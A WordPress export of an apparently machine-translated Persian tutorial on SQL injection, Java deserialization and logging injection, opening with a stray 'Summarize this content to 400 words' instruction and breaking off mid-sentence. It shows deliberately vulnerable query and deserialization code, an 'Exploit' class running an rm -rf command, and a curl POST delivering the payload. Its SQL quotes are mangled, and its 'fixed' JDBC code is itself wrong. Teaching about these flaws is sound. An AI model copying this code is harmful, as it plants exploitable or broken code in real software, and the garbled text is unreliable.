{"id":74975,"date":"2024-08-28T14:52:35","date_gmt":"2024-08-28T11:22:35","guid":{"rendered":"https:\/\/nabfollower.com\/blog\/top-security-flaws-hiding-in-your-code-right-now-and-how-to-fix-them-3id6\/"},"modified":"2024-08-28T14:52:35","modified_gmt":"2024-08-28T11:22:35","slug":"top-security-flaws-hiding-in-your-code-right-now-and-how-to-fix-them-3id6","status":"publish","type":"post","link":"https:\/\/nabfollower.com\/blog\/top-security-flaws-hiding-in-your-code-right-now-and-how-to-fix-them-3id6\/","title":{"rendered":"\u0628\u0631\u062a\u0631\u06cc\u0646 \u0646\u0642\u0635 \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u06a9\u0647 \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u062f\u0631 \u06a9\u062f \u0634\u0645\u0627 \u067e\u0646\u0647\u0627\u0646 \u0634\u062f\u0647 \u0627\u0646\u062f – \u0648 \u0646\u062d\u0648\u0647 \u0631\u0641\u0639 \u0622\u0646\u0647\u0627"},"content":{"rendered":"

Summarize this content to 400 words in Persian Lang
\n \u062f\u0631 \u0633\u0627\u0644 \u06f2\u06f0\u06f1\u06f9\u060c \u06cc\u06a9 \u0631\u062e\u0646\u0647 \u0645\u0639\u0631\u0648\u0641 \u062f\u0631 \u0628\u0627\u0632\u06cc \u0645\u0639\u0631\u0648\u0641 Fortnite\u060c \u0645\u06cc\u0644\u06cc\u0648\u0646\u200c\u0647\u0627 \u0628\u0627\u0632\u06cc\u06a9\u0646 \u0631\u0627 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0628\u062f\u0627\u0641\u0632\u0627\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f. \u0627\u06cc\u0646 \u062d\u0627\u062f\u062b\u0647 \u0627\u0647\u0645\u06cc\u062a \u0627\u06cc\u0645\u0646 \u0633\u0627\u0632\u06cc \u0635\u062d\u06cc\u062d \u067e\u0627\u06cc\u06af\u0627\u0647 \u0647\u0627\u06cc \u062f\u0627\u062f\u0647 SQL \u0631\u0627 \u0628\u0631\u062c\u0633\u062a\u0647 \u06a9\u0631\u062f.<\/p>\n

\u0627\u0645\u0627 \u0627\u06cc\u0646 \u06cc\u06a9 \u0645\u0648\u0636\u0648\u0639 \u0645\u0646\u0641\u0631\u062f \u0646\u06cc\u0633\u062a.<\/p>\n

\u062d\u0645\u0644\u0627\u062a \u0645\u062a\u0639\u062f\u062f\u06cc \u0634\u0627\u0645\u0644 \u062a\u0632\u0631\u06cc\u0642 SQL \u0631\u062e \u062f\u0627\u062f\u0647 \u0627\u0633\u062a\u060c \u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647\u200c\u0627\u06cc \u06a9\u0647 \u062a\u0633\u0644\u0627 \u062f\u0631 \u0633\u0627\u0644 2018 \u062a\u062c\u0631\u0628\u0647 \u06a9\u0631\u062f. \u062f\u0631 \u0622\u0646 \u0645\u0648\u0631\u062f\u060c \u06cc\u06a9 \u062d\u0645\u0644\u0647 \u062a\u0632\u0631\u06cc\u0642 SQL \u062f\u06cc\u06af\u0631 \u0628\u0631 \u06a9\u0646\u0633\u0648\u0644 Kubernetes \u062a\u0633\u0644\u0627 \u062a\u0623\u062b\u06cc\u0631 \u06af\u0630\u0627\u0634\u062a \u0648 \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0631\u06cc\u067e\u062a\u0648 \u0628\u0627\u0639\u062b \u062e\u0633\u0627\u0631\u0627\u062a \u0645\u0627\u0644\u06cc \u0634\u062f.<\/p>\n

\u0627\u0645\u0627 \u0627\u06cc\u0646 \u0641\u0642\u0637 \u062f\u0631 \u0645\u0648\u0631\u062f SQL Injection \u0646\u06cc\u0633\u062a.<\/p>\n

\u0628\u0631\u062f\u0627\u0631\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u062f\u06cc\u06af\u0631\u06cc \u0646\u06cc\u0632 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u06a9\u0647 \u06a9\u062f \u0634\u0645\u0627 \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u0627\u0632 \u0622\u0646\u0647\u0627 \u0631\u0646\u062c \u0645\u06cc \u0628\u0631\u062f\u060c \u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0628\u0632\u0631\u06af \u062f\u0631 \u06af\u0630\u0634\u062a\u0647 \u0622\u0633\u06cc\u0628 \u062f\u06cc\u062f\u0647 \u0627\u0646\u062f. <\/p>\n

\u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0633\u0627\u0644 2021 \u062f\u0631 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Log4J \u0628\u0647 \u0646\u0627\u0645 Log4Shell \u06a9\u0647 \u0634\u0627\u0645\u0644 \u06cc\u06a9 \u062d\u0645\u0644\u0647 logging injection \u0628\u0648\u062f \u06a9\u0647 \u062a\u0627 \u0628\u0647 \u0627\u0645\u0631\u0648\u0632 \u0645\u06cc\u0644\u06cc\u0648\u0646 \u0647\u0627 \u0633\u0631\u0648\u0631 \u0631\u0627 \u062f\u0631 \u0633\u0631\u0627\u0633\u0631 \u062c\u0647\u0627\u0646 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u060c \u06cc\u0627 \u062f\u0631 \u0633\u0627\u0644 2022 \u062f\u0631 Atlassian Jira \u06a9\u0647 \u0634\u0627\u0645\u0644 \u06cc\u06a9 \u062d\u0645\u0644\u0647 deserialization \u0628\u0648\u062f \u06a9\u0647 \u0686\u0646\u062f\u06cc\u0646 \u0646\u0633\u062e\u0647 \u0627\u0632 Jira \u0631\u0627 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f \u0648 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0631\u0627 \u0628\u0647 \u062c\u06cc\u0631\u0627 \u0648\u0627\u06af\u0630\u0627\u0631 \u06a9\u0631\u062f. \u0645\u0647\u0627\u062c\u0645<\/p>\n

\u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0631\u0627\u06cc \u0647\u0631 \u06a9\u0633\u06cc \u0627\u062a\u0641\u0627\u0642 \u0628\u06cc\u0641\u062a\u062f\u060c \u062d\u062a\u06cc \u0628\u0631\u0627\u06cc \u0634\u0645\u0627.<\/p>\n

\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647\u060c \u0645\u0646 \u062f\u0631 \u0645\u0648\u0631\u062f 3 \u062d\u0645\u0644\u0647 \u0631\u0627\u06cc\u062c \u062f\u0631 \u06a9\u062f \u0628\u062d\u062b \u062e\u0648\u0627\u0647\u0645 \u06a9\u0631\u062f: \u062a\u0632\u0631\u06cc\u0642 SQL\u060c \u062a\u0632\u0631\u06cc\u0642 Deserialization\u060c \u0648 Logging Injection \u0648 \u0646\u062d\u0648\u0647 \u062d\u0644 \u0622\u0646\u0647\u0627.<\/p>\n

SQL Injection<\/p>\n

\u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0631\u0627 \u062f\u0631 \u067e\u0627\u06cc\u06af\u0627\u0647\u200c\u0647\u0627\u06cc \u062f\u0627\u062f\u0647 \u0630\u062e\u06cc\u0631\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0627\u0632 \u0645\u0642\u0627\u062f\u06cc\u0631 \u062a\u0648\u0644\u06cc\u062f \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0645\u062c\u0648\u0632\u0647\u0627\u060c \u0630\u062e\u06cc\u0631\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u06cc\u0627 \u0628\u0647 \u0633\u0627\u062f\u06af\u06cc \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0630\u062e\u06cc\u0631\u0647 \u0634\u062f\u0647 \u062f\u0631 \u062c\u062f\u0627\u0648\u0644\u060c \u0627\u0633\u0646\u0627\u062f\u060c \u0646\u0642\u0627\u0637\u060c \u06af\u0631\u0647\u200c\u0647\u0627 \u0648 \u063a\u06cc\u0631\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/p>\n

\u062f\u0631 \u0622\u0646 \u0644\u062d\u0638\u0647\u060c \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0645\u0627 \u0627\u0632 \u0627\u06cc\u0646 \u0645\u0642\u0627\u062f\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0627\u062f\u0631\u0633\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u062f\u0647\u062f \u062a\u0627 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u0627\u0636\u0627\u0641\u06cc \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0647 \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0645\u0642\u0627\u062f\u06cc\u0631 \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u06cc\u0627 \u062d\u062a\u06cc \u062a\u063a\u06cc\u06cc\u0631 \u0622\u0646 \u062c\u062f\u0627\u0648\u0644 \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 \u0645\u0639\u0631\u0641\u06cc \u06a9\u0646\u0646\u062f.<\/p>\n

\u06a9\u062f \u0632\u06cc\u0631 \u0628\u0627 \u062f\u0631 \u0646\u0638\u0631 \u06af\u0631\u0641\u062a\u0646 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0627\u0631\u0627\u0626\u0647 \u0634\u062f\u0647 \u062f\u0631 \u0635\u0641\u062d\u0647 \u0648\u0631\u0648\u062f\u060c \u06a9\u0627\u0631\u0628\u0631 \u0631\u0627 \u0627\u0632 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0645\u06cc \u06a9\u0646\u062f. \u0628\u0647 \u0646\u0638\u0631 \u0645\u06cc \u0631\u0633\u062f \u0647\u0645\u0647 \u0686\u06cc\u0632 \u062e\u0648\u0628 \u0627\u0633\u062a.<\/p>\n

public List findUsers(String user, String pass) throws Exception {
\n String query = “SELECT userid FROM users ” +
\n “WHERE username=”” + user + “” AND password='” + pass + “‘”;
\n Statement statement = connection.createStatement();
\n ResultSet resultSet = statement.executeQuery(query);
\n List users = new ArrayList();
\n while (resultSet.next()) {
\n users.add(resultSet.getString(0));
\n }
\n return users;
\n }<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u06cc\u0646 \u06a9\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0631\u0648\u0646\u200c\u06cc\u0627\u0628\u06cc \u0631\u0634\u062a\u0647\u200c\u0627\u06cc\u060c \u0646\u062a\u0627\u06cc\u062c \u063a\u06cc\u0631\u0645\u0646\u062a\u0638\u0631\u0647\u200c\u0627\u06cc \u0631\u0627 \u0628\u0647 \u0647\u0645\u0631\u0627\u0647 \u062e\u0648\u0627\u0647\u062f \u062f\u0627\u0634\u062a \u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u062c\u0627\u0632\u0647 \u0648\u0631\u0648\u062f \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f.<\/p>\n

\u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0627\u06cc\u0646 \u0645\u0634\u06a9\u0644\u060c \u0627\u06cc\u0646 \u0631\u0648\u06cc\u06a9\u0631\u062f \u0631\u0627 \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u062d\u0627\u0642 \u0631\u0634\u062a\u0647 \u0628\u0647 \u062a\u0632\u0631\u06cc\u0642 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc \u062f\u0647\u06cc\u0645. \u062f\u0631 \u0648\u0627\u0642\u0639\u060c \u0627\u0644\u062d\u0627\u0642 \u0631\u0634\u062a\u0647 \u0647\u0627 \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0644\u06cc \u0627\u0632 \u0646\u0638\u0631 \u0639\u0645\u0644\u06a9\u0631\u062f \u0648 \u0627\u0645\u0646\u06cc\u062a \u0627\u06cc\u062f\u0647 \u0628\u062f\u06cc \u0627\u0633\u062a.<\/p>\n

String query = “SELECT userid FROM users ” +
\n “WHERE username=”” + user + “” AND password='” + pass + “‘”;<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631\u062c \u0645\u0642\u0627\u062f\u06cc\u0631 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 \u0628\u0647 \u0637\u0648\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u062f\u0631 \u0631\u0634\u062a\u0647 SQL\u060c \u0628\u0647 \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0639\u062f\u0627\u064b \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u0645 \u0628\u0647 \u0622\u0646\u0647\u0627 \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u0645\u060c \u0645\u0634\u06a9\u0644 \u067e\u0631\u0633 \u0648 \u062c\u0648\u0647\u0627\u06cc \u0647\u06a9 \u0634\u062f\u0647 \u0631\u0627 \u062d\u0644 \u0645\u06cc \u06a9\u0646\u062f.<\/p>\n

String query = “SELECT userid FROM users WHERE username = ? AND password = ?”;<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u06a9\u062f \u062b\u0627\u0628\u062a \u0645\u0627 \u0628\u0627 \u0622\u0645\u0627\u062f\u0647\u200c\u0633\u0627\u0632\u06cc \u0648 \u062a\u0646\u0638\u06cc\u0645 \u0645\u0642\u062f\u0627\u0631 \u0628\u0631\u0627\u06cc \u0647\u0631 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 \u0628\u0647 \u0627\u06cc\u0646 \u0634\u06a9\u0644 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f.<\/p>\n

public List findUsers(String user, String pass) throws Exception {
\n String query = “SELECT userid FROM users WHERE username = ? AND password = ?”;
\n try (PreparedStatement statement = connection.prepareStatement(query)) {
\n statement.setString(1, user);
\n statement.setString(2, pass);
\n ResultSet resultSet = statement.executeQuery(query);
\n List users = new ArrayList();
\n while (resultSet.next()) {
\n users.add(resultSet.getString(0));
\n }
\n return users;
\n }
\n }<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0642\u0648\u0627\u0646\u06cc\u0646 SonarQube \u0648 SonarCloud \u06a9\u0647 \u0628\u0647 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 SQL \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u062f.<\/p>\n

\u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u0631\u06cc\u0627\u0644\u06cc\u0632\u0627\u0633\u06cc\u0648\u0646<\/p>\n

Deserialization \u0641\u0631\u0622\u06cc\u0646\u062f \u062a\u0628\u062f\u06cc\u0644 \u062f\u0627\u062f\u0647 \u0647\u0627 \u0627\u0632 \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u0633\u0631\u06cc\u0627\u0644\u06cc (\u0645\u0627\u0646\u0646\u062f \u06cc\u06a9 \u062c\u0631\u06cc\u0627\u0646 \u0628\u0627\u06cc\u062a\u060c \u0631\u0634\u062a\u0647 \u06cc\u0627 \u0641\u0627\u06cc\u0644) \u0628\u0647 \u06cc\u06a9 \u0634\u06cc \u06cc\u0627 \u0633\u0627\u062e\u062a\u0627\u0631 \u062f\u0627\u062f\u0647 \u0627\u06cc \u0627\u0633\u062a \u06a9\u0647 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0628\u0627 \u0622\u0646 \u06a9\u0627\u0631 \u06a9\u0646\u062f.<\/p>\n

\u06a9\u0627\u0631\u0628\u0631\u062f\u0647\u0627\u06cc \u0645\u062a\u062f\u0627\u0648\u0644 deserialization \u0634\u0627\u0645\u0644 \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u06cc\u0646 API \u0647\u0627 \u0648 \u0633\u0631\u0648\u06cc\u0633 \u0647\u0627\u06cc \u0648\u0628 \u0628\u0647 \u0634\u06a9\u0644 \u0633\u0627\u062e\u062a\u0627\u0631\u0647\u0627\u06cc JSON \u06cc\u0627 \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u06cc \u0645\u062f\u0631\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 RPC (Remote Procedure Call) \u0628\u0647 \u0634\u06a9\u0644 \u067e\u06cc\u0627\u0645 \u0647\u0627\u06cc \u067e\u0631\u0648\u062a\u0648\u0628\u0627\u0641 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc \u0634\u0648\u062f.<\/p>\n

\u0627\u06af\u0631 \u0647\u06cc\u0686 \u06af\u0627\u0645\u06cc \u0628\u0631\u0627\u06cc \u067e\u0627\u06a9\u0633\u0627\u0632\u06cc \u06cc\u0627 \u0628\u0631\u0631\u0633\u06cc \u0627\u062c\u0631\u0627 \u0646\u0634\u0648\u062f\u060c \u062a\u0628\u062f\u06cc\u0644 \u0628\u0627\u0631 \u067e\u06cc\u0627\u0645 \u0628\u0647 \u06cc\u06a9 \u0634\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u062c\u062f\u06cc \u0631\u0627 \u0628\u0647 \u0647\u0645\u0631\u0627\u0647 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f.<\/p>\n

protected void doGet(HttpServletRequest request, HttpServletResponse response) {
\n ServletInputStream servletIS = request.getInputStream();
\n ObjectInputStream objectIS = new ObjectInputStream(servletIS);
\n User user = (User) objectIS.readObject();
\n }
\n class User implements Serializable {
\n private static final long serialVersionUID = 1L;
\n private String name;<\/p>\n

public User(String name) {
\n this.name = name;
\n }<\/p>\n

public String getName() {
\n return name;
\n }
\n }<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u0645\u0627 \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u0645\u06cc \u0628\u06cc\u0646\u06cc\u0645 \u06a9\u0647 \u0645\u0627 \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u06cc\u0645 objectIS\u060c \u06cc\u06a9 \u0645\u0642\u062f\u0627\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u06a9\u0647 \u0627\u0632 \u06a9\u0627\u0631\u0628\u0631 \u062f\u0631 \u062c\u0631\u06cc\u0627\u0646 \u0648\u0631\u0648\u062f\u06cc \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0645\u06cc \u0622\u06cc\u062f \u0648 \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06cc\u06a9 \u0634\u06cc \u062c\u062f\u06cc\u062f \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc \u06a9\u0646\u062f.\u0645\u0627 \u0627\u0646\u062a\u0638\u0627\u0631 \u062f\u0627\u0631\u06cc\u0645 \u06a9\u0647 \u0645\u0642\u062f\u0627\u0631 \u0647\u0645\u06cc\u0634\u0647 \u06cc\u06a9\u06cc \u0627\u0632 \u06a9\u0644\u0627\u0633 \u0647\u0627\u06cc\u06cc \u0628\u0627\u0634\u062f \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0645\u0627 \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u062f. \u0645\u0637\u0645\u0626\u0646\u0627\u060c \u0645\u0634\u062a\u0631\u06cc \u0645\u0627 \u0647\u0631\u06af\u0632 \u0686\u06cc\u0632 \u062f\u06cc\u06af\u0631\u06cc \u0627\u0631\u0633\u0627\u0644 \u0646\u0645\u06cc \u06a9\u0646\u062f\u060c \u062f\u0631\u0633\u062a \u0627\u0633\u062a\u061f \u0622\u06cc\u0627 \u0622\u0646\u0647\u0627\u061f<\/p>\n

\u0627\u0645\u0627 \u0627\u06af\u0631 \u06cc\u06a9 \u06a9\u0644\u0627\u06cc\u0646\u062a \u0645\u062e\u0631\u0628 \u06a9\u0644\u0627\u0633 \u062f\u06cc\u06af\u0631\u06cc \u0631\u0627 \u062f\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f \u0686\u0647\u061f<\/p>\n

public class Exploit implements Serializable {
\n private static final long serialVersionUID = 1L;<\/p>\n

public Exploit() {
\n \/\/ Malicious action: Delete a file
\n try {
\n Runtime.getRuntime().exec(“rm -rf \/tmp\/vulnerable.txt”);
\n } catch (Exception e) {
\n e.printStackTrace();
\n }
\n }
\n }<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u062f\u0631 \u0627\u06cc\u0646 \u062d\u0627\u0644\u062a\u060c \u06a9\u0644\u0627\u0633\u06cc \u062f\u0627\u0631\u06cc\u0645 \u06a9\u0647 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u0631\u0627 \u062f\u0631 \u0637\u0648\u0644 \u0633\u0627\u0632\u0646\u062f\u0647 \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u062d\u0630\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u062f\u0631 \u0642\u0628\u0644\u06cc \u0627\u062a\u0641\u0627\u0642 \u0645\u06cc\u200c\u0627\u0641\u062a\u062f readObject \u062a\u0645\u0627\u0633 \u0628\u06af\u06cc\u0631\u06cc\u062f.<\/p>\n

\u0645\u0647\u0627\u062c\u0645 \u0641\u0642\u0637 \u0628\u0627\u06cc\u062f \u0627\u06cc\u0646 \u06a9\u0644\u0627\u0633 \u0631\u0627 \u0633\u0631\u06cc\u0627\u0644 \u06a9\u0631\u062f\u0647 \u0648 \u0628\u0647 API \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f:<\/p>\n

Exploit exploit = new Exploit();
\n FileOutputStream fileOut = new FileOutputStream(“exploit.ser”);
\n ObjectOutputStream out = new ObjectOutputStream(fileOut);
\n out.writeObject(exploit);
\n…
\n$ curl -X POST –data-binary @exploit.ser http:\/\/vulnerable-api.com\/user<\/p>\n

\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/p>\n

\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/p>\n

\u062e\u0648\u0634\u0628\u062e\u062a\u0627\u0646\u0647 \u06cc\u06a9 \u0631\u0627\u0647 \u0622\u0633\u0627\u0646 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0627\u06cc\u0646 \u0645\u0634\u06a9\u0644 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f. \u0642\u0628\u0644 \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0634\u06cc\u060c \u0628\u0627\u06cc\u062f \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0622\u06cc\u0627 \u06a9\u0644\u0627\u0633\u06cc \u06a9\u0647 \u0642\u0631\u0627\u0631 \u0627\u0633\u062a deserialized \u0634\u0648\u062f \u0627\u0632 \u06cc\u06a9\u06cc \u0627\u0632 \u0627\u0646\u0648\u0627\u0639 \u0645\u062c\u0627\u0632 \u0627\u0633\u062a \u06cc\u0627 \u062e\u06cc\u0631.<\/p>\n

\u062f\u0631 \u06a9\u062f \u0628\u0627\u0644\u0627\u060c \u06cc\u06a9 ObjectInputStream \u062c\u062f\u06cc\u062f \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f\u0647\u200c\u0627\u06cc\u0645 \u06a9\u0647 \u0645\u062a\u062f \u00abresolveClass\u00bb \u0644\u063a\u0648 \u0634\u062f\u0647 \u0648 \u062d\u0627\u0648\u06cc \u0628\u0631\u0631\u0633\u06cc \u0646\u0627\u0645 \u06a9\u0644\u0627\u0633 \u0627\u0633\u062a. \u0645\u0627 \u0627\u0632 \u0627\u06cc\u0646 \u06a9\u0644\u0627\u0633 \u062c\u062f\u06cc\u062f\u060c SecureObjectInputStream\u060c \u0628\u0631\u0627\u06cc \u062f\u0631\u06cc\u0627\u0641\u062a \u062c\u0631\u06cc\u0627\u0646 \u0634\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u06cc\u0645. \u0627\u0645\u0627 \u0645\u0627 \u06cc\u06a9 \u0628\u0631\u0631\u0633\u06cc \u0644\u06cc\u0633\u062a \u0645\u062c\u0627\u0632 \u0631\u0627 \u0642\u0628\u0644 \u0627\u0632 \u062e\u0648\u0627\u0646\u062f\u0646 